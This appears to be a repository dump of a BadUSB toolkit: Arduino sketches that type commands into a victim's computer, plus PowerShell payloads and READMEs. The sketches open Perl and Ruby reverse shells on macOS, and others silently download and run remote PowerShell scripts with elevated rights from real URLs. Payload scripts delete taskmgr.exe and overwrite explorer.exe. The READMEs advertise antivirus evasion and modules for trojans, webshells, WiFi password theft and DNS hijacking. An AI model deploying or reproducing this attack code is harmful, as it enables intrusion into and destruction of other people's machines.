    "content": "\n\nvoid setup()\n{\n  delay(5000);\n  run(\"terminal\");\n  delay(3000);\n  Keyboard.print(\"perl -MIO -e '$p=fork;exit,if\");\n  delay(100);\n  Keyboard.print(\"($p);$c=new IO::Socket::INET\");\n  delay(100);\n  Keyboard.print(\"(PeerAddr,\\\"INPUT0:INPUT1\\\"\");\n  delay(100);\n  Keyboard.print(\");STDIN->fdopen($c,r);$~->\");\n  delay(100);\n  Keyboard.print(\"fdopen($c,w);system$_ \");\n  delay(100);\n  Keyboard.println(\"while<>;'\");\n  \n    \n}\n\nvoid loop()\n{\n   \n}\n\nvoid run(char *SomeCommand){\n  \n  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n  Keyboard.set_key1(KEY_SPACE);\n  Keyboard.send_now();\n\n  delay(500);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n\n  Keyboard.print(SomeCommand);\n  Keyboard.set_key1(KEY_ENTER);\n  Keyboard.send_now();\n\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n}\n\n"
  },
  {
    "path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (ruby_shell).ino",
    "content": "\nvoid setup()\n{\n  \n    delay(5000);\n  run(\"terminal\");\n  delay(3000);\n  Keyboard.print(\"ruby -rsocket -e 'exit if fork;\");\n  delay(100);\n  Keyboard.print(\"c=TCPSocket.new\");\n  delay(100);\n  Keyboard.print(\"(\\\"INPUT0\\\",\\\"INPUT1\\\"\");\n  delay(100);\n  Keyboard.print(\");while(cmd=c.gets);IO.popen\");\n  delay(100);\n  Keyboard.println(\"(cmd,\\\"r\\\"){|io|c.print io.read}end'\");\n  delay(100);\n    \n}\n\nvoid loop()\n{\n   \n}\n\nvoid run(char *SomeCommand){\n  \n  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n  Keyboard.set_key1(KEY_SPACE);\n  Keyboard.send_now();\n\n  delay(500);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n\n  Keyboard.print(SomeCommand);\n  Keyboard.set_key1(KEY_ENTER);\n  Keyboard.send_now();\n\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n}\n\n\n"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv0/FullScreenHackedv/FullScreenHackedv.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP\");\n  delay(1000);\n  Keyboard.println(\"START-PROCESS -fILEpATH POWERSHELL \\\" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\\'HTTP://FQ.WC.LT/UP/1459435782.PS1\\',\\'C:\\\\USERS\\\\PUBLIC\\\\GET.PS1\\');./GET.PS1;EXIT\\\" -vERB RUNAS;EXIT\");\n  delay(500);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯\n}\nvoid loop()//循环\n{\n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_LEFT_ALT);\n  delay(50);\n}\n"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv0/get.ps1",
    "content": "cd \\;\n(New-Object System.Net.Webclient).DownloadFile(\"http://image.cnsc8.com/tupian_201501/Big_Pic/nRz13KeMr5.jpg\",\"c:\\x.jpg\");\nStart-Sleep -Seconds 5;\nreg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /d c:\\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;\ntaskkill /F /IM explorer.exe;\nStart-Sleep -Seconds 5;\nreg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /d c:\\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;\ntaskkill /F /IM explorer.exe;\nRemove-Item get.ps1;\nexit;"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv2/FullScreenHackedv2.ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(5000);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(500); \n  Keyboard.press('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"POWERSHELL -W HIDDEN -NOP -C \\\"IEX(nEW-oBJECT nET.wEBcLIENT).dOWNLOADsTRING('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1')\\\";EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\nvoid loop()\n{\n}\n"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv2/wall.ps1",
    "content": "$down=\"$env:userprofile\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp\"\n(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);\nstart-sleep 5\ncmd /c \"reg add `\"HKEY_CURRENT_USER\\Control Panel\\Desktop`\" /v `\"WallpaperStyle`\" /t reg_sz /d 2 /f\"\ncmd /c \"reg add `\"HKEY_CURRENT_USER\\Control Panel\\Desktop`\" /v Wallpaper /d `\"%userProfile%\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp`\" /f\"\ncmd /c \"reg add `\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`\" /v Wallpaper /d `\"%userProfile%\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp`\" /f\"\ncmd /c \"reg add `\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`\" /v WallpaperStyle /d \"2\" /f\"\ncmd /c \"RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters\"\ncmd /c \"gpupdate /force\"\ncmd /c \"takeown /f c:\\windows\\explorer.exe\"\ncmd /c \"echo y `|cacls c:\\windows\\explorer.exe /g administrator:f\"\ncmd /c \"icacls c:\\windows\\explorer.exe /grant administrator:f\"\ncmd /c \"takeown /f C:\\Windows\\System32\\taskmgr.exe\"\ncmd /c \"echo y `|cacls C:\\Windows\\System32\\taskmgr.exe /g administrator:f\"\ncmd /c \"icacls c:\\windows\\System32\\taskmgr.exe /grant administrator:f\"\ncmd /c \"del /f /q C:\\Windows\\System32\\taskmgr.exe\"\ncmd /c \"taskkill /f /im explorer.exe&echo 123>c:\\windows\\explorer.exe\""
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/FullScreenHackedv3/FullScreenHackedv3.ino",
    "content": "void setup(){\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP\");\n  Keyboard.println();\n  delay(1000);\n  Keyboard.println(\"START-PROCESS -fILEpATH POWERSHELL \\\" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;IEX(nEW-OBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADsTRING(`'HTTP://PAN.PLYZ.NET/D.ASP?U=1235108351&P=GET.PS1`');EXIT\\\" -vERB RUNAS;EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n  //bypass uac 绕过UAC,这一段不会用的不要用,否则后果自负\n  //Keyboard.press(KEY_LEFT_ALT);\n  //Keyboard.print('y');\n  //Keyboard.release(KEY_LEFT_ALT);\n}\n"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/get.ps1",
    "content": "$down=\"$env:userprofile\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp\"\n(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);\nstart-sleep 5\ncmd /c \"reg add `\"HKEY_CURRENT_USER\\Control Panel\\Desktop`\" /v `\"WallpaperStyle`\" /t reg_sz /d 2 /f\"\ncmd /c \"reg add `\"HKEY_CURRENT_USER\\Control Panel\\Desktop`\" /v Wallpaper /d `\"%userProfile%\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp`\" /f\"\ncmd /c \"reg add `\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`\" /v Wallpaper /d `\"%userProfile%\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp`\" /f\"\ncmd /c \"reg add `\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`\" /v WallpaperStyle /d \"2\" /f\"\ncmd /c \"RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters\"\ncmd /c \"gpupdate /force\"\ncmd /c \"takeown /f c:\\windows\\explorer.exe\"\ncmd /c \"echo y `|cacls c:\\windows\\explorer.exe /g administrator:f\"\ncmd /c \"icacls c:\\windows\\explorer.exe /grant administrator:f\"\ncmd /c \"takeown /f C:\\Windows\\System32\\taskmgr.exe\"\ncmd /c \"echo y `|cacls C:\\Windows\\System32\\taskmgr.exe /g administrator:f\"\ncmd /c \"icacls c:\\windows\\System32\\taskmgr.exe /grant administrator:f\"\ncmd /c \"del /f /q C:\\Windows\\System32\\taskmgr.exe\"\ncmd /c \"taskkill /f /im explorer.exe&echo \"h\">c:\\windows\\explorer.exe\""
  },
  {
    "path": "README.cn.md",
    "content": "# BadUSB\n![](https://img.shields.io/badge/BadUSB-fsociety-red)<br>\n该项目利用USB协议上的漏洞，通过更改USB的内部固件，在接入USB接口后，模拟外置鼠标、键盘的功能，以此来使目标主机执行已经精心构造好的命令。<br>\n\n![68747470733a2f2f696d616765732e67697465652e636f6d2f75706c6f6164732f696d616765732f323032312f303230322f3231333933325f36653462313436665f323332333636362e6a706567](https://user-images.githubusercontent.com/39434325/112772972-75a8e900-9066-11eb-9948-895916bf18ef.jpg)<br>\n#### QQ交流群：775942445\n#### 加微信-进入交流群：wwy18795980897\n\n### 前言\n和大多数人一样，最初见到BadUSB是在美剧《黑客军团》中，是fsociety组织常用的工具之一，无论是向服务器下载木马控制被害者主机，还是达琳在停车场帅气的扔出大量USB钓鱼，BadUSB都是功不可没的物理武器之一。  \n![黑客军团](https://upload-images.jianshu.io/upload_images/11477676-71045c807dac0df6.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 优势\n在USB攻击领域，很多年前常用的是老式USB病毒（自动运行）autorun.inf，但文件现在已经会被杀毒软件轻易地查杀，与autorun.inf不同，BadUSB是利用了USB协议上的漏洞，通过更改USB的内部固件，在正常的USB接口接入后，模拟外置鼠标、键盘的功能，以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用，U盘格式化根本无法阻止其内部代码的执行。  \n![Leonardo_Arduino](https://upload-images.jianshu.io/upload_images/11477676-4347a3e41663dde6.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n我最新欢的是Leonardo_Arduino板子，因为同样是对USB的利用，Windows、Linux、MAC等各类操作系统默认存在leonardo_Arduino的USB接口驱动，不必联网下载专用的驱动程序。此外，向BadUSB烧录的程序极为简单，大部分是对键盘、鼠标按键进行模拟，上手较为容易。  \nBadUSB也是社会工程学的一个典型示例，它极大地利用了人们的好奇心，在路边捡到的USB，估计九成以上的人们都想看看里面有什么东西，而当你插入个人主机或公司内网，攻击就很难再停止下来了。<br>\n![BadUSB钓鱼](https://upload-images.jianshu.io/upload_images/11477676-3d1f812778254931.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 教程\n[具体步骤请移步至简书](https://www.jianshu.com/p/2b2b1dab85fe) <br>\n![操作步骤](https://upload-images.jianshu.io/upload_images/11477676-390539861bec703c.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 目录导图<br>\n\n     BadUSB\n     │  LICENSE\n     │  README.en.md\n     │  README.md\n     │  \n     ├─BlueScreen蓝屏\n     │      BlueScreen蓝屏1（DOS）.ino\n     │      BlueScreen蓝屏2（DOS）.ino\n     │      
BlueScreen蓝屏3（DOS）.ino\n     │      xp和win7的蓝屏代码（DOS攻击）.ino\n     │      延迟蓝屏（DOS）.ino\n     │      注册表写入致使开机蓝屏通用（DOS）.ino\n     │      注册表写入致使开机蓝屏（DOS）.ino\n     │      \n     ├─CobaltStrike木马联动\n     │  │  BitsAdmin木马执行（与CS联动）.ino\n     │  │  Pl木马执行（与CS联动）.ino\n     │  │  PSL木马执行（与CS联动）.ino\n     │  │  PY木马执行（与CS联动）.ino\n     │  │  Regsvr32木马执行（与CS联动）.ino\n     │  │  \n     │  ├─CobaltStrike各种语言的Payload\n     │  │      payload.bin\n     │  │      payload.c\n     │  │      payload.cs\n     │  │      payload.java\n     │  │      payload.pl\n     │  │      payload.ps1\n     │  │      payload.py\n     │  │      payload.rb\n     │  │      payload.sct\n     │  │      payload.txt\n     │  │      payload.vba\n     │  │      \n     │  └─CounterStrike木马制作教程\n     │          CounterStrike.jpg\n     │          CounterStrike木马制作教程.png\n     │          \n     ├─DNS劫持\n     │      DOS命令设置多个DNS（DNS劫持）.ino\n     │      PSL命令设置多个DNS（DNS劫持）.ino\n     │      \n     ├─Linux内置反向Shell\n     │      Linux内置的反向Shell（BashShell）.ino\n     │      Linux反向Shell（PerlShell）.ino\n     │      Linux反向Shell（代码执行）.ino\n     │      \n     ├─MSF木马联动\n     │      shell.apk\n     │      shell.asp\n     │      shell.aspx\n     │      shell.elf\n     │      shell.exe\n     │      shell.jar\n     │      shell.jsp\n     │      shell.macho\n     │      shell.php\n     │      shell.pl\n     │      shell.psl\n     │      shell.py\n     │      shell.sh\n     │      shell.war\n     │      Shell木马生成配置.txt\n     │      \n     ├─OSX内置反向Shell\n     │      osx系统反向连接（dns_shell）.ino\n     │      osx系统反向连接（perl_shell）.ino\n     │      osx系统反向连接（ruby_shell）.ino\n     │      \n     ├─PSL全屏HACKED画面\n     │  ├─FullScreenHackedv0\n     │  │  │  get.ps1\n     │  │  │  \n     │  │  └─FullScreenHackedv\n     │  │          FullScreenHackedv.ino\n     │  │          \n     │  ├─FullScreenHackedv2\n     │  │      FullScreenHackedv2.ino\n     │  │      wall.ps1\n     │  │      \n     │  └─FullScreenHackedv3[慎用]\n     │      │  
get.ps1\n     │      │  \n     │      └─FullScreenHackedv3\n     │              FullScreenHackedv3.ino\n     │              \n     ├─Ubuntu信息搜集\n     │      Ubuntu信息搜集到TXT文件（信息）.ino\n     │      Ubuntu的基本终端命令（显示）.ino\n     │      \n     ├─WIFI密码获取\n     │      WIFI密码导出（工具）.ino\n     │      Wifi密码捕获（工具）.ino\n     │      \n     ├─WIFI连接木马\n     │      强迫连接指定WIFI并下载psl木马运行（木马入侵）.ino\n     │      \n     ├─代码原理解读\n     │      arduino按键代码基础.ino\n     │      MSF木马制作教程.txt\n     │      关于setup和loop方法的说明.txt\n     │      \n     ├─木马下载器\n     │  ├─CERTUTIL木马下载器（木马攻击）代码\n     │  │      链接服务器msf木马certutil下载版.ino\n     │  │      \n     │  ├─FTP木马下载器（木马攻击）代码\n     │  │      FTP下载netcat并反向连接shell（木马攻击）.ino\n     │  │      \n     │  ├─JAVA木马写入（木马攻击）代码\n     │  │      java木马写入（目标环境可运行Java）.ino\n     │  │      server.java\n     │  │      \n     │  ├─PSL木马下载器（木马攻击）代码\n     │  │      powershell下载服务器木马.ino\n     │  │      psl木马下载器1（木马攻击）.ino\n     │  │      psl木马下载器2（木马攻击）.ino\n     │  │      psl木马下载器3通用（木马攻击）.ino\n     │  │      psl木马下载器4通用（木马攻击）.ino\n     │  │      psl木马下载器win&linux通用（木马攻击）.ino\n     │  │      psl木马写入并反弹（木马攻击）.ino\n     │  │      下载psl木马并二次执行（木马攻击）.ino\n     │  │      链接服务器msf木马psl下载版.ino\n     │  │      链接服务器psl下载版.ino\n     │  │      \n     │  └─PY木马下载器（木马攻击）代码\n     │          PyShellServer.py\n     │          Py木马写入（目标环境可运行Python）.ino\n     │          \n     ├─添加用户并开启服务\n     │      添加用户并开启3389（工具）.ino\n     │      添加用户并开启ftp（工具）.ino\n     │      \n     ├─特定功能代码\n     │      Alt_F4循环关闭窗口后关机（工具）.ino\n     │      Shift后门（工具）.ino\n     │      单纯改变所有用户密码（恶作剧项）.ino\n     │      启动PSL远程连接功能（工具）.ino\n     │      强制删除360各项进程（工具）.ino\n     │      强制执行关机ShutDown命令（工具）.ino\n     │      截屏并发送指定FTP地址（工具）.ino\n     │      打开对方445端口（内网渗透）.ino\n     │      打开指定网页（工具）.ino\n     │      更改所用账户密码+关闭系统进程+蓝屏（工具）.ino\n     │      添加用户代码（工具）.ino\n     │      简简单单关个机（恶作剧项）.ino\n     │      隐藏CMD窗口（显示）.ino\n     │      鼠标不停移动（工具）.ino\n     │      \n     ├─网站一句话入侵代码\n     │      
aspx一句话木马写入（网站服务器版本-过狗过D盾）.ino\n     │      aspx一句话木马写入（网站服务器版本） .ino\n     │      asp一句话木马写入（网站服务器版本-Script Encoder 加密）.ino\n     │      asp一句话木马写入（网站服务器版本-动态解码）.ino\n     │      asp一句话木马写入（网站服务器版本） .ino\n     │      jsp一句话木马写入（jsp网站服务器使用）.ino\n     │      jsp木马写入（jsp网站服务器使用非一句话）.ino\n     │      php木马写入（php网站服务器使用-异或绕过）.ino\n     │      php木马写入（php网站服务器使用-类绕过）.ino\n     │      php木马写入（php网站服务器使用）.ino\n     │      \n     └─运行U盘内的程序_扩大入侵范围\n         ├─UdiskRun\n         │      UdiskRun.ino\n         │      \n         ├─UdiskRunv2\n         │      UdiskRunv2.ino\n         │      \n         └─UdiskRunv3\n                UdiskRunv3.ino\n\n\n### 演示<br>\n[更改所用账户密码+关闭系统进程+蓝屏测试](https://www.yuque.com/u12074055/gzgwfh/dg804t)<br>\n![演示](https://upload-images.jianshu.io/upload_images/11477676-31390e8446540ca3.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 进阶<br>\n网站一句话入侵<br>\nBadUSB&MSF联动<br>\nBadUSB&CS联动<br>\nWIFI局域网入侵<br>\n运行U盘内的程序_扩大入侵范围<br>\n![进阶](https://upload-images.jianshu.io/upload_images/11477676-cc6c47da713ac2e2.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 解疑<br>\n你可以在微信、QQ群、Gitee、Gihub上留言，团队看到后会尽快回复。\n![常见问题和错误](https://upload-images.jianshu.io/upload_images/11477676-0c90a8004d5e5420.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 扩展<br>\n实现特定功能<br>\n其他实现BadUSB功能的板子（需要另安驱动，不是特别推荐）<br>\n![扩展](https://upload-images.jianshu.io/upload_images/11477676-bba7de72abd2072d.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 更新<br>\n###### 2021.02.06更新代码，部分是从其他爱好者哪里搜寻的开源代码，部分是与MSF联动的方法流程以及我认为比较好用的Arduino Leonardo基础按键代码<br>\n###### 2021.02.14更新代码，从其他优秀项目中获得启发，加入了CobaltStrike联动的木马、DNS劫持代码、linux和osx内置反向shell、WIFI连接木马、WIFI密码获取、网站一句话入侵代码、psl全屏hacked画面、运行U盘内的程序_扩大入侵范围以及实现很多实用功能的代码，情人节快乐！<br>\n![更新](https://upload-images.jianshu.io/upload_images/11477676-a54932b08d3ef2da.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 
项目链接<br>\n\n代码已上传至GitHub及Gitee，**跪求star**，其他项目也挺好玩的， **继续跪求Star**。<br>\n\n **GitHub：** https://github.com/wangwei39120157028/BadUSB<br>\n \n **Gitee：**  https://gitee.com/wwy2018/BadUSB<br>\n"
  },
  {
    "path": "README.md",
    "content": "# BadUSB\n![](https://img.shields.io/badge/BadUSB-fsociety-red)<br>\nThis project takes advantage of a loophole in the USB protocol. By changing the internal firmware of a USB device, it simulates the functions of an external mouse and keyboard after being plugged into a USB interface, so as to make the target host execute well-constructed commands.<br>\n\n![68747470733a2f2f696d616765732e67697465652e636f6d2f75706c6f6164732f696d616765732f323032312f303230322f3231333933325f36653462313436665f323332333636362e6a706567](https://user-images.githubusercontent.com/39434325/112772972-75a8e900-9066-11eb-9948-895916bf18ef.jpg)<br>\n#### QQ：775942445<br>\n#### WeChat：wwy18795980897<br>\n\n### Introduction<br>\nLike most people, I first came across BadUSB in Mr. Robot, where it is one of FSociety's most popular tools. Whether it's downloading a Trojan to a server to control a victim's host, or Darlene throwing a bunch of USB phishing devices in a parking lot, BadUSB is one of the most important physical weapons.  <br>\n![黑客军团](https://upload-images.jianshu.io/upload_images/11477676-71045c807dac0df6.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Advantage<br>\nIn the field of USB attacks, the method commonly used many years ago was the old autorun USB virus, autorun.inf, but that file is now easily detected by antivirus software. Unlike autorun.inf, BadUSB uses a loophole in the USB protocol: by changing the internal firmware of the USB device, it simulates an external mouse and keyboard once plugged into a normal USB port, so as to make the target host execute carefully constructed commands. This process does not arouse a trace of suspicion from antivirus software or firewalls. And because it's at the firmware level, USB flash drive formatting can't prevent the execution of its internal code.  
<br>\n![Leonardo_Arduino](https://upload-images.jianshu.io/upload_images/11477676-4347a3e41663dde6.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\nMy latest favorite is the leonardo_Arduino board: it is likewise a use of USB, and Windows, Linux, Mac and other operating systems include a leonardo_Arduino USB interface driver by default, so there is no need to download a dedicated driver over the network. In addition, the programs burned to the BadUSB are very simple, mostly simulating keyboard and mouse key presses, so it is easy to get started.  <br>\nBadUSB is also a good example of social engineering. It plays on people's curiosity. It's estimated that more than 90% of people will want to see what's inside a USB they pick up on the side of the road.  <br><br>\n![BadUSB钓鱼](https://upload-images.jianshu.io/upload_images/11477676-3d1f812778254931.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Tutorial  <br>\n[Video address](https://www.yuque.com/u12074055/cpuceb/qicml3) <br>\nVideo: Introduction to BadUSB Compiler<br>\nVideo: BadUSB driver installation and code writing<br>\nVideo: BadUSB basic operation<br>\n[For detailed steps, please go to Jianshu](https://www.jianshu.com/p/2b2b1dab85fe) <br>\n![操作步骤](https://upload-images.jianshu.io/upload_images/11477676-390539861bec703c.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Directory<br>\n    \n    BadUSB\n     │  LICENSE\n     │  README.en.md\n     │  README.md\n     │  \n     ├─AddUser_StartService\n     │      AddUser_Enable3389(tools).ino\n     │      AddUser_EnableFTP(tools).ino\n     │      \n     ├─BlueScreen\n     │      BlueScreen1(DOS).ino\n     │      BlueScreen2(DOS).ino\n     │      BlueScreen3(DOS).ino\n     │      BlueScreen_xp_win7(DOS).ino\n     │      DelayedBlueScreen (DOS).ino\n     │      RegistryWriteBlueScreen (DOS).ino\n     │      RegistryWriteBlueScreenGeneralUse (DOS).ino\n     │      \n     ├─CobaltStrike_Trojanlinkage\n     │  │  
Bitsadmin_TrojanExecution (LinkageWithCS).ino\n     │  │  Pl_TrojanExecution (LinkageWithCS).ino\n     │  │  PSL_TrojanExecution (LinkageWithCS).ino\n     │  │  PY_TrojanExecution (LinkageWithCS).ino\n     │  │  Regsvr32_TrojanExecution (LinkageWithCS).ino\n     │  │  \n     │  ├─CobaltStrike_Payload\n     │  │      payload.bin\n     │  │      payload.c\n     │  │      payload.cs\n     │  │      payload.java\n     │  │      payload.pl\n     │  │      payload.ps1\n     │  │      payload.py\n     │  │      payload.rb\n     │  │      payload.sct\n     │  │      payload.txt\n     │  │      payload.vba\n     │  │      \n     │  └─CounterStrikeTrojanTutorial\n     │          CounterStrike.jpg\n     │          CounterStrikeTutorial.png\n     │          \n     ├─CodePrincipleInterpretation\n     │      ArduinoKeyCodeBase.ino\n     │      InstructionsOn_setup_loop_Methods.txt\n     │      MSF_TrojanMakingTutorial.txt\n     │      \n     ├─DNSHijack\n     │      DOS_CommandSetMultipleDNS(DNSHijack).ino\n     │      PSL_CommandSetMultipleDNS(DNSHijack).ino\n     │      \n     ├─Linux_Built-inReverseShell\n     │      LinuxReverseShell (CodeExecution).ino\n     │      LinuxReverseShell(BashShell).ino\n     │      LinuxReverseShell(PerlShell).ino\n     │      \n     ├─MSF_Trojanlinkage\n     │      shell.apk\n     │      shell.asp\n     │      shell.aspx\n     │      shell.elf\n     │      shell.exe\n     │      shell.jar\n     │      shell.jsp\n     │      shell.macho\n     │      shell.php\n     │      shell.pl\n     │      shell.psl\n     │      shell.py\n     │      shell.sh\n     │      shell.war\n     │      Shell_TrojanGenerationConfiguration.txt\n     │      \n     ├─OSX_Built-inReverseShell\n     │      OSX_SystemReverseConnection (dns_shell).ino\n     │      OSX_SystemReverseConnection (perl_shell).ino\n     │      OSX_SystemReverseConnection (ruby_shell).ino\n     │      \n     ├─PSL_FullScreen-HACKED\n     │  ├─FullScreenHackedv0\n     │  │  │  get.ps1\n     │  │  │ 
 \n     │  │  └─FullScreenHackedv\n     │  │          FullScreenHackedv.ino\n     │  │          \n     │  ├─FullScreenHackedv2\n     │  │      FullScreenHackedv2.ino\n     │  │      wall.ps1\n     │  │      \n     │  └─FullScreenHackedv3\n     │      │  get.ps1\n     │      │  \n     │      └─FullScreenHackedv3\n     │              FullScreenHackedv3.ino\n     │              \n     ├─RunProgramOn_UDrive_ExpandScopeOfIntrusion\n     │  ├─UdiskRun\n     │  │      UdiskRun.ino\n     │  │      \n     │  ├─UdiskRunv2\n     │  │      UdiskRunv2.ino\n     │  │      \n     │  └─UdiskRunv3\n     │          UdiskRunv3.ino\n     │          \n     ├─Site_AWord_IntrusionCode\n     │      AspSentenceTrojanWrite(webServerVersion).ino\n     │      AspSentenceTrojanWriting(websiteServerVersion-DynamicDecoding).ino\n     │      AspSentenceTrojanWriting(websiteServerVersion-ScriptEncoderEncryption).ino\n     │      AspxSentenceTrojanWrite(webServerVersion OverDog_OverDShield).ino\n     │      AspxSentenceTrojanWrite(webServerVersion).ino\n     │      JspSentenceTrojanWritten (JSP_websiteServerUse).ino\n     │      JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino\n     │      PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino\n     │      PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino\n     │      PHP_TrojanWrite(usedByPHP_websiteServer).ino\n     │      \n     ├─SpecificFunctionCode\n     │      AddUserCode(Tools).ino\n     │      Alt-f4_Loop.ino\n     │      ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino\n     │      EnablePSL_RemoteConnection(Tools).ino\n     │      ForcedDeletionOf360Processes(Tools).ino\n     │      ForceShutDownCommand(Tool).ino\n     │      Hide_CMD_Window(Display).ino\n     │      MouseKeepsMoving(Tools).ino\n     │      OpenPort445.ino\n     │      OpenSpecified_webPage.ino\n     │      ShiftBackdoor.ino\n     │      SimplyChangeAllUsersPasswords(TrickItem).ino\n     │      SimplyShutDownMachine(TrickItem).ino\n     │      
TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino\n     │      \n     ├─TrojanDownloader\n     │  ├─CERTUTIL_DownLoader\n     │  │      CERTUTIL_DownLoader_MSF.ino\n     │  │      \n     │  ├─FTP_DownLoader\n     │  │      FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino\n     │  │      \n     │  ├─JAVA_DownLoader\n     │  │      JavaTrojanWrite(TargetEnvironmentRunJava).ino\n     │  │      server.java\n     │  │      \n     │  ├─PSL_DownLoader\n     │  │      Downloa_PSL_Trojan-Execute_aSecondTime.ino\n     │  │      LinkServer_MSF_PSL_Download.ino\n     │  │      LinkServer_PSL_Download.ino\n     │  │      PSL_DownLoader0.ino\n     │  │      PSL_DownLoader1.ino\n     │  │      PSL_DownLoader2.ino\n     │  │      PSL_DownLoader3.ino\n     │  │      PSL_DownLoader4.ino\n     │  │      PSL_Downloader_Win&Linux_General.ino\n     │  │      PSL_Writes_Bounces.ino\n     │  │      \n     │  └─PY_DownLoader\n     │          PyShellServer.py\n     │          Py_TrojanWrite(TargetEnvironmentRunPython).ino\n     │          \n     ├─Ubuntu_InformationGathering\n     │      BasicTerminalCommandsForUbuntu(Display).ino\n     │      UbuntuInformationCollectionTXT_File(Information).ino\n     │      \n     ├─WiFi_ConnectionTrojan\n     │      